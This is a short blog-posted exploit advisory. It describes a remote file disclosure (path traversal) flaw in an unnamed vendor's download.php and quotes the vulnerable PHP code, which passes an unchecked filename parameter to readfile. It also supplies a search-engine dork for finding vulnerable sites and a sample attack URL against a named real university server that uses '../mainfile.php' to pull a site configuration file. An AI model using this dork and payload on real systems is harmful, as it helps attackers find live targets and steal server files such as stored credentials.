===========================================
Bug : Remote File Discolousure Vulnerability
Vendor : unknown
Author : Xshadow
Contact : admin[a]cukdus[dot]org
Visit: : http://xshadow-power[dot]com
===========================================
[o]Vulnerable file
download.php
$filename=$_GET["filename"];
$fullpath="dokumen/".$filename;
session_cache_limiter("public, post-check=50");
header("Cache-Control: private");
header("Content-Type: application/zip");
header("Content-Length: ".filesize($fullpath));
header("Content-Disposition: attachment; filename=$filename");
readfile($fullpath);
dork: download.php?filename= site:my
Sample: http://chemical.eng.um.edu.my/download.php?filename=../mainfile.php
Label: Exploit
0 Comments:
Subscribe to:
Posting Komentar (Atom)
